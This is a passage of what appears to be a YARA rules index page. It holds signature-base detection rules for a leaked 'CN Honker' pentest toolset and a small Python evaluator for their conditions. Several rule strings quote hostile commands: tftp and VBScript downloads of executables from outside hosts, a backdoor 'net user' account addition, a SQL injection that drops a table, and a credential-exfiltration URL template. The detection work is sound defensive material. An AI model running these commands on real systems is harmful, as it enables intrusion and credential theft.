YARA rules
18,880 rules indexed · pattern-based malware identification
YARA rules identify and classify malware families by matching byte patterns, text strings and file metadata such as size and header magic. The rules below are gathered from several open repositories; each entry lists the rule name, its description and the raw signature as published.
Using these YARA rules
Deploy. Load them into any YARA-capable scanner: your EDR if it supports YARA, the yara CLI against files or a memory image, VirusTotal Retrohunt, or a host scanner like Loki or THOR.
Adapt. Tighten or loosen the string and condition matches to your own false-positive tolerance; a rule written for one campaign can over-match on benign files in a different environment. Look in particular at rules whose condition needs only `1 of them` or `2 of them` and whose strings carry a `Goodware String` comment: a single common string can then carry half the match.
Scope. These rules are for hunting known malware families in files and memory images and for triaging samples; they are not for network traffic or log-based detection, which the IDS and Sigma rule sets cover.
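What those conditions actually test, as an added example (this is not the page's or signature-base's code, and not a substitute for the yara CLI or yara-python): a small Python evaluator for exactly the YARA subset the CN_Honker rules below use. It copies the strings and condition of CN_Honker_F4ck_Team_f4ck_2 from this page, runs them against constructed byte buffers (stand-ins, not real toolset files), and shows how `uint16(0) == 0x5a4d`, `wide`, `fullword`, `filesize` and `2 of them` behave; the last call overrides the condition with `3 of them`, which is the Adapt step in practice.

```python
"""Evaluator for the YARA subset these CN_Honker rules use: text strings with the
ascii/wide/fullword modifiers, uint16(0) magic, filesize < N KB, all/N of them.
Added example, not from signature-base and not a substitute for yara itself."""
import re

STRING_RE = re.compile(r'^\$(\w+)\s*=\s*"((?:[^"\\]|\\.)*)"\s*([^/]*)')
SUPPORTED_MODS = {"ascii", "wide", "fullword"}
ESCAPES = {"n": "\n", "t": "\t", "r": "\r", '"': '"', "\\": "\\"}

# strings: and condition: of CN_Honker_F4ck_Team_f4ck_2, copied from this page (meta omitted).
F4CK_2 = r'''
rule CN_Honker_F4ck_Team_f4ck_2 {
    strings:
        $s1 = "F4ck.exe" fullword wide
        $s2 = "@Netapi32.dll" fullword ascii
        $s3 = "Team.F4ck.Net" fullword wide
        $s8 = "Administrators" fullword ascii /* PEStudio Blacklist: strings */ /* Goodware String - occured 14 times */
        $s9 = "F4ck Team" fullword wide
    condition:
        uint16(0) == 0x5a4d and filesize < 220KB and 2 of them
}
'''

def unescape(text):
    """YARA text-string body -> raw bytes. Handles the \\\\, \\", \\n, \\t, \\r escapes (no \\xNN)."""
    return re.sub(r"\\(.)", lambda m: ESCAPES[m.group(1)], text).encode("latin-1")

def parse_rule(rule_text):
    """Return {'name', 'strings': {id: (bytes, modifiers)}, 'condition'}; unknown syntax raises."""
    name = re.search(r"\brule\s+(\w+)", rule_text).group(1)
    strings_blk, _, rest = rule_text.partition("strings:")[2].partition("condition:")
    strings = {}
    for line in (ln.strip() for ln in strings_blk.splitlines()):
        if not line.startswith("$"):
            continue
        m = STRING_RE.match(line)
        if not m or not set(m.group(3).split()) <= SUPPORTED_MODS:
            raise ValueError(f"{name}: unsupported string definition: {line}")
        strings["$" + m.group(1)] = (unescape(m.group(2)), set(m.group(3).split()))
    return {"name": name, "strings": strings, "condition": rest.partition("}")[0].strip()}

def _fullword_ok(data, start, end, step):
    """fullword: no alphanumeric character touches the match on either side.
    step is 1 for ascii, 2 for wide, where one character is <byte, 0x00>."""
    def alnum_char(chunk):
        return len(chunk) == step and chunk[:1].isalnum() and chunk[1:] in (b"", b"\x00")
    before = data[start - step:start] if start >= step else b""
    return not alnum_char(before) and not alnum_char(data[end:end + step])

def string_found(data, pattern, mods):
    """True if the string occurs in an encoding its modifiers allow (ascii is the default)."""
    variants = [(pattern, 1)] if "ascii" in mods or "wide" not in mods else []
    if "wide" in mods:  # UTF-16LE: every byte of the string followed by 0x00
        variants.append((pattern.decode("latin-1").encode("utf-16-le"), 2))
    for needle, step in variants:
        pos = data.find(needle)
        while pos != -1:
            if "fullword" not in mods or _fullword_ok(data, pos, pos + len(needle), step):
                return True
            pos = data.find(needle, pos + 1)
    return False

def matches(rule, data, condition=None):
    """Evaluate the rule's condition (or an overriding one, the 'Adapt' step) against data."""
    hits = sum(string_found(data, pat, mods) for pat, mods in rule["strings"].values())
    for clause in re.split(r"\s+and\s+", condition or rule["condition"]):
        if m := re.fullmatch(r"uint16\(0\)\s*==\s*0x([0-9a-fA-F]+)", clause):
            # little-endian read: 0x5a4d is the byte pair 4d 5a, i.e. "MZ"; 0x2123 is "#!"
            ok = len(data) >= 2 and int.from_bytes(data[:2], "little") == int(m.group(1), 16)
        elif m := re.fullmatch(r"filesize\s*<\s*(\d+)\s*KB", clause):
            ok = len(data) < int(m.group(1)) * 1024
        elif clause == "all of them":
            ok = hits == len(rule["strings"])
        elif m := re.fullmatch(r"(\d+)\s+of\s+them", clause):
            ok = hits >= int(m.group(1))
        else:
            raise ValueError(f"{rule['name']}: unsupported clause {clause!r}")
        if not ok:
            return False
    return True

def pe_like(*chunks):
    """Constructed stand-in for a PE file: MZ magic, padding, chunks separated by two NULs."""
    return b"MZ" + b"\x00" * 62 + b"\x00\x00".join(chunks)

# Constructed samples, not real files from the toolset.
SAMPLES = {
    "toolkit": pe_like("F4ck.exe".encode("utf-16-le"), b"Administrators"),  # $s1 + $s8 -> match
    "narrow": pe_like(b"F4ck.exe", b"Administrators"),  # $s1 wants wide, so only $s8 -> 1 hit
    "script": b"#!/bin/sh\n" + "F4ck.exe".encode("utf-16-le") + b" Administrators",  # not MZ
    "glued": pe_like("F4ck.exe".encode("utf-16-le"), b"LocalAdministratorsGroup"),  # fullword fails
}

if __name__ == "__main__":
    rule = parse_rule(F4CK_2)
    print({name: matches(rule, data) for name, data in SAMPLES.items()})
    # Adapt: one "Goodware String" plus one tool string satisfies "2 of them"; require 3 instead.
    print(matches(rule, SAMPLES["toolkit"], "uint16(0) == 0x5a4d and filesize < 220KB and 3 of them"))
```

Real scanning belongs to yara or yara-python, which also handle hex strings, regular expressions, modules and short-circuit evaluation; this toy refuses anything outside the subset rather than guessing. The point the rule's own `Goodware String` comment makes is visible in the `toolkit` sample: `Administrators` plus a single tool-specific wide string already satisfies `2 of them`, and raising the threshold to 3 drops that sample.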
Rules
50 shown of 18,880
CN_Honker_CoolScan_scan
Sample from CN Honker Pentest Toolset - file scan.exe
rule CN_Honker_CoolScan_scan {
meta:
description = "Sample from CN Honker Pentest Toolset - file scan.exe"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "Disclosed CN Honker Pentest Toolset"
date = "2015-06-23"
score = 70
hash = "e1c5fb6b9f4e92c4264c7bea7f5fba9a5335c328"
id = "781446d2-3363-56c3-9767-c7ac70047b68"
strings:
$s0 = "User-agent:\\s{0,32}(huasai|huasai/1.0|\\*)" fullword ascii /* PEStudio Blacklist: strings */
$s1 = "scan web.exe" fullword wide /* PEStudio Blacklist: strings */
condition:
uint16(0) == 0x5a4d and filesize < 3680KB and all of them
}
CN_Honker_Cracker_SHELL
Sample from CN Honker Pentest Toolset - file SHELL.exe
rule CN_Honker_Cracker_SHELL {
meta:
description = "Sample from CN Honker Pentest Toolset - file SHELL.exe"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "Disclosed CN Honker Pentest Toolset"
date = "2015-06-23"
score = 70
hash = "c1dc349ff44a45712937a8a9518170da8d4ee656"
id = "2249a058-7469-5054-9c51-cb20ef8197ca"
strings:
$s1 = "http://127.0.0.1/error1.asp" fullword ascii /* PEStudio Blacklist: strings */
$s2 = "password,PASSWORD,pass,PASS,Lpass,lpass,Password" fullword wide /* PEStudio Blacklist: strings */
$s3 = "\\SHELL" wide /* PEStudio Blacklist: strings */
$s4 = "WebBrowser1" fullword ascii /* PEStudio Blacklist: strings */
condition:
uint16(0) == 0x5a4d and filesize < 200KB and all of them
}
CN_Honker_DLL_passive_privilege_escalation_ws2help
Sample from CN Honker Pentest Toolset - file ws2help.dll
rule CN_Honker_DLL_passive_privilege_escalation_ws2help {
meta:
description = "Sample from CN Honker Pentest Toolset - file ws2help.dll"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "Disclosed CN Honker Pentest Toolset"
date = "2015-06-23"
score = 70
hash = "e539b799c18d519efae6343cff362dcfd8f57f69"
id = "85a07bb7-2856-56f0-bd15-e020bb2a7692"
strings:
$s0 = "PassMinDll.dll" fullword ascii
$s1 = "\\ws2help.dll" ascii
condition:
uint16(0) == 0x5a4d and filesize < 30KB and all of them
}
CN_Honker_D_injection_V2_32
Sample from CN Honker Pentest Toolset - file D_injection_V2.32.exe
rule CN_Honker_D_injection_V2_32 {
meta:
description = "Sample from CN Honker Pentest Toolset - file D_injection_V2.32.exe"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "Disclosed CN Honker Pentest Toolset"
date = "2015-06-23"
score = 70
hash = "3a000b976c79585f62f40f7999ef9bdd326a9513"
id = "4c661c35-61ee-5ee7-9b8e-9908fbe0362b"
strings:
$s0 = "Missing %s property(CommandText does not return a result set{Error creating obje" wide /* PEStudio Blacklist: strings */
$s1 = "/tftp -i 219.134.46.245 get 9493.exe c:\\9394.exe" fullword ascii
condition:
uint16(0) == 0x5a4d and filesize < 5000KB and all of them
}
CN_Honker_DictionaryGenerator
Sample from CN Honker Pentest Toolset - file DictionaryGenerator.exe
rule CN_Honker_DictionaryGenerator {
meta:
description = "Sample from CN Honker Pentest Toolset - file DictionaryGenerator.exe"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "Disclosed CN Honker Pentest Toolset"
date = "2015-06-23"
score = 70
hash = "b3071c64953e97eeb2ca6796fab302d8a77d27bc"
id = "29ce6f8c-3092-5917-ab31-aaed7834c500"
strings:
$s1 = "`PasswordBuilder" fullword ascii /* PEStudio Blacklist: strings */
$s2 = "cracker" fullword ascii /* PEStudio Blacklist: strings */
condition:
uint16(0) == 0x5a4d and filesize < 3650KB and all of them
}
CN_Honker_F4ck_Team_BlackMoon_Jun15
Sample from CN Honker Pentest Toolset - file f4ck.exe
rule CN_Honker_F4ck_Team_BlackMoon_Jun15 {
meta:
description = "Sample from CN Honker Pentest Toolset - file f4ck.exe"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "Disclosed CN Honker Pentest Toolset"
old_rule_name = "CN_Honker_F4ck_Team_f4ck_3"
date = "2015-06-23"
score = 70
hash = "7e3bf9b26df08cfa10f10e2283c6f21f5a3a0014"
id = "df12daca-8e03-5382-b71d-96a747d3a043"
strings:
$s1 = "File UserName PassWord [comment] /add" fullword ascii /* PEStudio Blacklist: strings */
$s2 = "No Net.exe Add User" fullword ascii
$s3 = "BlackMoon RunTime Error:" fullword ascii
$s4 = "Team.F4ck.Net" fullword wide
$s5 = "admin 123456789" fullword ascii /* PEStudio Blacklist: strings */
$s6 = "blackmoon" fullword ascii
$s7 = "f4ck Team" fullword wide
condition:
uint16(0) == 0x5a4d and filesize < 100KB and 4 of them
}
CN_Honker_F4ck_Team_F4ck_3
Sample from CN Honker Pentest Toolset - file F4ck_3.exe
rule CN_Honker_F4ck_Team_F4ck_3 {
meta:
description = "Sample from CN Honker Pentest Toolset - file F4ck_3.exe"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "Disclosed CN Honker Pentest Toolset"
date = "2015-06-23"
score = 70
hash = "0b3e9381930f02e170e484f12233bbeb556f3731"
id = "1767669f-47d0-5d6e-97a5-92522f988102"
strings:
$s1 = "F4ck.exe" fullword wide
$s2 = "@Netapi32.dll" fullword ascii
$s3 = "Team.F4ck.Net" fullword wide
$s6 = "NO Net Add User" fullword wide
$s7 = "DLL ERROR" fullword ascii
$s11 = "F4ck Team" fullword wide
condition:
uint16(0) == 0x5a4d and filesize < 100KB and 3 of them
}
CN_Honker_F4ck_Team_f4ck
Script from disclosed CN Honker Pentest Toolset - file f4ck.txt
rule CN_Honker_F4ck_Team_f4ck {
meta:
description = "Script from disclosed CN Honker Pentest Toolset - file f4ck.txt"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "Disclosed CN Honker Pentest Toolset"
date = "2015-06-23"
score = 70
hash = "e216f4ba3a07de5cdbb12acc038cd8156618759e"
id = "abf2f277-79b4-5ca2-b12e-93a662e5d607"
strings:
$s0 = "PassWord:F4ckTeam!@#" fullword ascii /* PEStudio Blacklist: strings */
$s1 = "UserName:F4ck" fullword ascii /* PEStudio Blacklist: strings */
$s2 = "F4ck Team" fullword ascii
condition:
filesize < 1KB and all of them
}
CN_Honker_F4ck_Team_f4ck_2
Sample from CN Honker Pentest Toolset - file f4ck_2.exe
rule CN_Honker_F4ck_Team_f4ck_2 {
meta:
description = "Sample from CN Honker Pentest Toolset - file f4ck_2.exe"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "Disclosed CN Honker Pentest Toolset"
date = "2015-06-23"
score = 70
hash = "0783661077312753802bd64bf5d35c4666ad0a82"
id = "b2a9067f-57d0-5b32-87c8-3b635c3944a5"
strings:
$s1 = "F4ck.exe" fullword wide
$s2 = "@Netapi32.dll" fullword ascii
$s3 = "Team.F4ck.Net" fullword wide
$s8 = "Administrators" fullword ascii /* PEStudio Blacklist: strings */ /* Goodware String - occured 14 times */
$s9 = "F4ck Team" fullword wide
condition:
uint16(0) == 0x5a4d and filesize < 220KB and 2 of them
}
CN_Honker_FTP_scanning
Sample from CN Honker Pentest Toolset - file FTP_scanning.exe
rule CN_Honker_FTP_scanning {
meta:
description = "Sample from CN Honker Pentest Toolset - file FTP_scanning.exe"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "Disclosed CN Honker Pentest Toolset"
date = "2015-06-23"
score = 70
hash = "5a3543ee5aed110c87cbc3973686e785bcb5c44e"
id = "828a0dc8-3748-5c07-a767-4f9e85968ca1"
strings:
$s1 = "CNotSupportedE" fullword ascii /* PEStudio Blacklist: strings */
$s2 = "nINet.dll" fullword ascii
$s9 = "?=MODULE" fullword ascii /* PEStudio Blacklist: strings */
$s13 = "MSIE 6*" fullword ascii
condition:
uint16(0) == 0x5a4d and filesize < 550KB and all of them
}
CN_Honker_Fckeditor
Sample from CN Honker Pentest Toolset - file Fckeditor.exe
rule CN_Honker_Fckeditor {
meta:
description = "Sample from CN Honker Pentest Toolset - file Fckeditor.exe"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "Disclosed CN Honker Pentest Toolset"
date = "2015-06-23"
score = 70
hash = "4b16ae12c204f64265acef872526b27111b68820"
id = "eb8767cb-b081-5c37-b7ad-57a0de047462"
strings:
$s0 = "explorer.exe http://user.qzone.qq.com/568148075" fullword wide /* PEStudio Blacklist: strings */
$s7 = "Fckeditor.exe" fullword wide /* PEStudio Blacklist: strings */
condition:
uint16(0) == 0x5a4d and filesize < 1340KB and all of them
}
CN_Honker_Fpipe_FPipe
Sample from CN Honker Pentest Toolset - file FPipe.exe
rule CN_Honker_Fpipe_FPipe {
meta:
description = "Sample from CN Honker Pentest Toolset - file FPipe.exe"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "Disclosed CN Honker Pentest Toolset"
date = "2015-06-23"
score = 50
hash = "a2c51c6fa93a3dfa14aaf31fb1c48a3a66a32d11"
id = "0d84aa8f-dc15-5bb7-a568-224c6a837685"
strings:
$s1 = "Unable to create TCP listen socket. %s%d" fullword ascii /* PEStudio Blacklist: strings */
$s2 = "http://www.foundstone.com" fullword ascii
$s3 = "%s %s port %d. Address is already in use" fullword ascii /* PEStudio Blacklist: strings */
condition:
uint16(0) == 0x5a4d and filesize < 20KB and all of them
}
CN_Honker_GetHashes
Sample from CN Honker Pentest Toolset - file GetHashes.exe
rule CN_Honker_GetHashes {
meta:
description = "Sample from CN Honker Pentest Toolset - file GetHashes.exe"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "Disclosed CN Honker Pentest Toolset"
date = "2015-06-23"
score = 70
hash = "dc8bcebf565ffffda0df24a77e28af681227b7fe"
id = "b1c5910d-0fb1-547e-92b7-5fcf183e38a6"
strings:
$s0 = "SAM\\Domains\\Account\\Users\\Names registry hive reading error!" fullword ascii /* PEStudio Blacklist: strings */
$s1 = "GetHashes <SAM registry file> [System key file]" fullword ascii /* PEStudio Blacklist: strings */
$s2 = "Note: Windows registry file shall begin from 'regf' signature!" fullword ascii /* PEStudio Blacklist: strings */
condition:
uint16(0) == 0x5a4d and filesize < 87KB and 2 of them
}
CN_Honker_GetHashes_2
Sample from CN Honker Pentest Toolset - file GetHashes.exe
rule CN_Honker_GetHashes_2 {
meta:
description = "Sample from CN Honker Pentest Toolset - file GetHashes.exe"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "Disclosed CN Honker Pentest Toolset"
date = "2015-06-23"
score = 70
hash = "35ae9ccba8d607d8c19a065cf553070c54b091d8"
id = "31117d2e-caf1-58c9-8525-b40b73097928"
strings:
$s1 = "GetHashes.exe <SAM registry file> [System key file]" fullword ascii /* PEStudio Blacklist: strings */
$s2 = "GetHashes.exe $Local" fullword ascii
$s3 = "The system key doesn't match SAM registry file!" fullword ascii /* PEStudio Blacklist: strings */
condition:
uint16(0) == 0x5a4d and filesize < 300KB and 2 of them
}
CN_Honker_GetPass_GetPass
Sample from CN Honker Pentest Toolset - file GetPass.exe
rule CN_Honker_GetPass_GetPass {
meta:
description = "Sample from CN Honker Pentest Toolset - file GetPass.exe"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "Disclosed CN Honker Pentest Toolset"
date = "2015-06-23"
score = 70
hash = "d18d952b24110b83abd17e042f9deee679de6a1a"
id = "999d0ac0-a112-53db-9dbe-10fa4419cfae"
strings:
$s1 = "\\only\\Desktop\\" ascii
$s2 = "To Run As Administuor" ascii /* PEStudio Blacklist: strings */
$s3 = "Key to EXIT ... & pause > nul" fullword ascii /* PEStudio Blacklist: strings */
condition:
uint16(0) == 0x5a4d and filesize < 300KB and all of them
}
CN_Honker_GetSyskey
Sample from CN Honker Pentest Toolset - file GetSyskey.exe
rule CN_Honker_GetSyskey {
meta:
description = "Sample from CN Honker Pentest Toolset - file GetSyskey.exe"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "Disclosed CN Honker Pentest Toolset"
date = "2015-06-23"
score = 70
hash = "17cec5e75cda434d0a1bc8cdd5aa268b42633fe9"
id = "08f5b5b1-3085-5bf1-9789-023be5a039f8"
strings:
$s2 = "GetSyskey <SYSTEM registry file> [Output system key file]" fullword ascii /* PEStudio Blacklist: strings */
$s4 = "The system key file \"%s\" is created." fullword ascii /* PEStudio Blacklist: strings */
condition:
uint16(0) == 0x5a4d and filesize < 40KB and all of them
}
CN_Honker_GetWebShell
Sample from CN Honker Pentest Toolset - file GetWebShell.exe
rule CN_Honker_GetWebShell {
meta:
description = "Sample from CN Honker Pentest Toolset - file GetWebShell.exe"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "Disclosed CN Honker Pentest Toolset"
date = "2015-06-23"
score = 70
hash = "b63b53259260a7a316932c0a4b643862f65ee9f8"
id = "919883f4-af66-5d07-ad41-8cba3e049396"
strings:
$s0 = "echo P.Open \"GET\",\"http://www.baidu.com/ma.exe\",0 >>run.vbs" fullword ascii /* PEStudio Blacklist: strings */
$s5 = "http://127.0.0.1/sql.asp?id=1" fullword wide /* PEStudio Blacklist: strings */
$s14 = "net user admin$ hack /add" fullword wide /* PEStudio Blacklist: strings */
$s15 = ";Drop table [hack];create table [dbo].[hack] ([cmd] [image])--" fullword wide /* PEStudio Blacklist: strings */
condition:
uint16(0) == 0x5a4d and filesize < 70KB and 1 of them
}
CN_Honker_GroupPolicyRemover
Sample from CN Honker Pentest Toolset - file GroupPolicyRemover.exe
rule CN_Honker_GroupPolicyRemover {
meta:
description = "Sample from CN Honker Pentest Toolset - file GroupPolicyRemover.exe"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "Disclosed CN Honker Pentest Toolset"
date = "2015-06-23"
score = 70
hash = "7475d694e189b35899a2baa462957ac3687513e5"
id = "e581172d-fcea-5281-ba9f-06b35c9a513e"
strings:
$s0 = "GP_killer.EXE" fullword wide /* PEStudio Blacklist: strings */
$s1 = "GP_killer Microsoft " fullword wide /* PEStudio Blacklist: strings */
$s2 = "SHDeleteKeyA" fullword ascii /* PEStudio Blacklist: strings */ /* Goodware String - occured 79 times */
condition:
uint16(0) == 0x5a4d and filesize < 700KB and all of them
}
CN_Honker_HASH_32
Sample from CN Honker Pentest Toolset - file 32.exe
rule CN_Honker_HASH_32 {
meta:
description = "Sample from CN Honker Pentest Toolset - file 32.exe"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "Disclosed CN Honker Pentest Toolset"
date = "2015-06-23"
score = 70
hash = "bf4a8b4b3e906e385feab5ea768f604f64ba84ea"
id = "a9b5b753-2028-53be-9ac8-50ec910860c3"
strings:
$s5 = "[Undefined OS version] Major: %d Minor: %d" fullword ascii
$s8 = "Try To Run As Administrator ..." fullword ascii /* PEStudio Blacklist: strings */
$s9 = "Specific LUID NOT found" fullword ascii
condition:
uint16(0) == 0x5a4d and filesize < 240KB and all of them
}
CN_Honker_HASH_PwDump7
Sample from CN Honker Pentest Toolset - file PwDump7.exe
rule CN_Honker_HASH_PwDump7 {
meta:
description = "Sample from CN Honker Pentest Toolset - file PwDump7.exe"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "Disclosed CN Honker Pentest Toolset"
date = "2015-06-23"
score = 70
hash = "93a2d7c3a9b83371d96a575c15fe6fce6f9d50d3"
id = "d61a1ac3-7c8a-5de2-a5a8-2a043b73f3b3"
strings:
$s1 = "%s\\SYSTEM32\\CONFIG\\SAM" fullword ascii /* PEStudio Blacklist: strings */
$s2 = "No Users key!" fullword ascii /* PEStudio Blacklist: strings */
$s3 = "NO PASSWORD*********************:" fullword ascii /* PEStudio Blacklist: strings */
$s4 = "Unable to dump file %S" fullword ascii /* PEStudio Blacklist: strings */
condition:
uint16(0) == 0x5a4d and filesize < 380KB and all of them
}
CN_Honker_HASH_pwhash
Sample from CN Honker Pentest Toolset - file pwhash.exe
rule CN_Honker_HASH_pwhash {
meta:
description = "Sample from CN Honker Pentest Toolset - file pwhash.exe"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "Disclosed CN Honker Pentest Toolset"
date = "2015-06-23"
score = 70
hash = "689056588f95749f0382d201fac8f58bac393e98"
id = "5d8c3648-a725-5f01-9800-b75b8c740cf1"
strings:
$s1 = "Example: quarks-pwdump.exe --dump-hash-domain --with-history" fullword ascii /* PEStudio Blacklist: strings */
$s2 = "quarks-pwdump.exe <options> <NTDS file>" fullword ascii /* PEStudio Blacklist: strings */
condition:
uint16(0) == 0x5a4d and filesize < 1000KB and 1 of them
}
CN_Honker_HTran2_4
Sample from CN Honker Pentest Toolset - file HTran2.4.exe
rule CN_Honker_HTran2_4 {
meta:
description = "Sample from CN Honker Pentest Toolset - file HTran2.4.exe"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "Disclosed CN Honker Pentest Toolset"
date = "2015-06-23"
score = 70
hash = "524f986692f55620013ab5a06bf942382e64d38a"
id = "21cb5ec5-900d-5092-8c2b-2d951289957c"
strings:
$s1 = "Enter Your Socks Type No: [0.BindPort 1.ConnectBack 2.Listen]:" fullword ascii /* PEStudio Blacklist: strings */
$s2 = "[+] New connection %s:%d !!" fullword ascii /* PEStudio Blacklist: strings */
condition:
uint16(0) == 0x5a4d and filesize < 180KB and all of them
}
CN_Honker_Happy_Happy
Sample from CN Honker Pentest Toolset - file Happy.exe
rule CN_Honker_Happy_Happy {
meta:
description = "Sample from CN Honker Pentest Toolset - file Happy.exe"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "Disclosed CN Honker Pentest Toolset"
date = "2015-06-23"
modified = "2023-01-27"
score = 70
hash = "92067d8dad33177b5d6c853d4d0e897f2ee846b0"
id = "6e6c806d-e784-507f-b327-3b9f2510422b"
strings:
$s1 = "<form.*?method=\"post\"[\\s\\S]*?</form>" fullword wide /* PEStudio Blacklist: strings */
$s2 = "domainscan.exe" fullword wide /* PEStudio Blacklist: strings */
$s3 = "http://www.happysec.com/" wide
$s4 = "cmdshell" fullword ascii /* PEStudio Blacklist: strings */
condition:
uint16(0) == 0x5a4d and filesize < 655KB and 2 of them
}
CN_Honker_Havij_Havij
Sample from CN Honker Pentest Toolset - file Havij.exe
rule CN_Honker_Havij_Havij {
meta:
description = "Sample from CN Honker Pentest Toolset - file Havij.exe"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "Disclosed CN Honker Pentest Toolset"
date = "2015-06-23"
score = 70
hash = "0d8b275bd1856bc6563dd731956f3b312e1533cd"
id = "b3640a32-b546-58c9-abb1-3da60dc6633c"
strings:
$s1 = "User-Agent: %Inject_Here%" fullword wide /* PEStudio Blacklist: strings */
$s2 = "BACKUP database master to disk='d:\\Inetpub\\wwwroot\\1.zip'" fullword ascii /* PEStudio Blacklist: strings */
condition:
uint16(0) == 0x5a4d and filesize < 3000KB and all of them
}
CN_Honker_HconSTFportable
Sample from CN Honker Pentest Toolset - file HconSTFportable.exe
rule CN_Honker_HconSTFportable {
meta:
description = "Sample from CN Honker Pentest Toolset - file HconSTFportable.exe"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "Disclosed CN Honker Pentest Toolset"
date = "2015-06-23"
score = 70
hash = "00253a00eadb3ec21a06911a3d92728bbbe80c09"
id = "591cbd4a-0035-5903-a7dc-8f8ee6dc9f50"
strings:
$s1 = "HconSTFportable.exe" fullword wide /* PEStudio Blacklist: strings */
$s2 = "www.Hcon.in" fullword wide
condition:
uint16(0) == 0x5a4d and filesize < 354KB and all of them
}
CN_Honker_Hookmsgina
Sample from CN Honker Pentest Toolset - file Hookmsgina.dll
rule CN_Honker_Hookmsgina {
meta:
description = "Sample from CN Honker Pentest Toolset - file Hookmsgina.dll"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "Disclosed CN Honker Pentest Toolset"
date = "2015-06-23"
score = 70
hash = "f4d9b329b45fbcf6a3b9f29f2633d5d3d76c9f9d"
id = "77813637-ec9f-599c-90c9-be1dd93b45f7"
strings:
$s1 = "\\\\.\\pipe\\WinlogonHack" fullword ascii /* PEStudio Blacklist: strings */
$s2 = "%s?host=%s&domain=%s&user=%s&pass=%s&port=%u" fullword ascii /* PEStudio Blacklist: strings */
$s3 = "Global\\WinlogonHack_Load%u" fullword ascii /* PEStudio Blacklist: strings */
$s4 = "Hookmsgina.dll" fullword ascii /* PEStudio Blacklist: strings */
condition:
uint16(0) == 0x5a4d and filesize < 300KB and all of them
}
CN_Honker_Htran_V2_40_htran20
Sample from CN Honker Pentest Toolset - file htran20.exe
rule CN_Honker_Htran_V2_40_htran20 {
meta:
description = "Sample from CN Honker Pentest Toolset - file htran20.exe"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "Disclosed CN Honker Pentest Toolset"
date = "2015-06-23"
score = 70
hash = "b992bf5b04d362ed3757e90e57bc5d6b2a04e65c"
id = "9dd1ab4b-108e-55be-b94d-2868ce00855e"
strings:
$s1 = "%s -slave ConnectHost ConnectPort TransmitHost TransmitPort" fullword ascii /* PEStudio Blacklist: strings */
$s2 = "Enter Your Socks Type No: [0.BindPort 1.ConnectBack 2.Listen]:" fullword ascii /* PEStudio Blacklist: strings */
$s3 = "[SERVER]connection to %s:%d error" fullword ascii /* PEStudio Blacklist: strings */
$s4 = "%s -connect ConnectHost [ConnectPort] Default:%d" fullword ascii /* PEStudio Blacklist: strings */
$s5 = "[+] got, ip:%s, port:%d" fullword ascii /* PEStudio Blacklist: strings */
$s6 = "[-] There is a error...Create a new connection." fullword ascii /* PEStudio Blacklist: strings */
condition:
uint16(0) == 0x5a4d and filesize < 200KB and all of them
}
CN_Honker_IIS6_iis6
Sample from CN Honker Pentest Toolset - file iis6.com
rule CN_Honker_IIS6_iis6 {
meta:
description = "Sample from CN Honker Pentest Toolset - file iis6.com"
